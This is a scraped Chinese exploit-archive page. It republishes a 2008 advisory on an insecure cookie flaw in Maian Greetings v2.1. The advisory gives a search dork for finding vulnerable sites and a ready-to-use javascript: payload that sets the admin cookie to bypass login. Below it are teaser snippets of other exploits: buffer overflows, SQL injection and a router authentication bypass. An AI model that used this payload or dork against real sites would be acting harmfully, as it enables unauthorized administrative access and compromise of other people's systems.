Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

所属分类：网络安全 / Exploit 阅读数： 85

收藏 0赞 0分享

Author: Saime
Date: July 12, 2008
Script: Maian Greetings v2.1 Insecure Cookie Handling Vulnerability
URL: http://www.maianscriptworld.co.uk
Dork: Powered by: Maian Greetings v2.1

Description:
Maian Greetings v2.1 is suffering from insecure cookie handling, the /admin/index.php only checks if cookie mecard_admin_cookie,
equals admin username.

Exploit:
javascript:document.cookie = "mecard_admin_cookie=admin; path=/php/demos/greetings/admin/"

更多精彩内容其他人还在看

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote Buffer Overflow Exploit Author: Koshi Original POC: http://www.milw0rm.com/exploi

收藏 0赞 0分享

MyBulletinBoard (MyBB)

<?php // forum mybb <= 1.2.11 remote sql injection vulnerability // bug found by Janek Vind "waraxe" http://www.waraxe

收藏 0赞 0分享

Acoustica Mixcraft

#!/usr/bin/perl # # Acoustica Mixcraft (mx4 file) Local Buffer Overflow Exploit # Author: Koshi # # Date: 08-28-08 ( 0day ) # Ap

收藏 0赞 0分享

Simple PHP Blog (SPHPBlog)

<? /* sIMPLE php bLOG 0.5.0 eXPLOIT bY mAXzA 2008 */ function curl($url,$postvar){ global $cook; $ch = cur

收藏 0赞 0分享

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

----------------------------------------------------------------------------- Ultra Office ActiveX Control Remote Arbitrary File Corruptio

收藏 0赞 0分享

Dana IRC 1.4a Remote Buffer Overflow Exploit

#!/usr/bin/perl # k`sOSe - 08/24/2008 # This is a useless and not portable exploit code, tested only on my winxp-sp3 VM. # I was loo

收藏 0赞 0分享

GeekLog

#!/usr/bin/perl use warnings; use strict; use LWP::UserAgent; use HTTP::Request::Common; print <<INTRO;

收藏 0赞 0分享

NoName Script

################################################################################ [ ] NoName Script 1.1 BETA Multiple Remote Vulnerabiliti

收藏 0赞 0分享

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print "

收藏 0赞 0分享

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

<html> <head> </head> <body> <b>html code to bypass the webinterface password protection of the Be

收藏 0赞 0分享

Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

Microsoft Visual Studio (Msmask32.ocx) ActiveX Remote BOF Exploit

MyBulletinBoard (MyBB)

Acoustica Mixcraft

Simple PHP Blog (SPHPBlog)

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Dana IRC 1.4a Remote Buffer Overflow Exploit

GeekLog

NoName Script

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

Belkin wireless G router ADSL2 modem Auth Bypass Exploit

网络赚钱

站长故事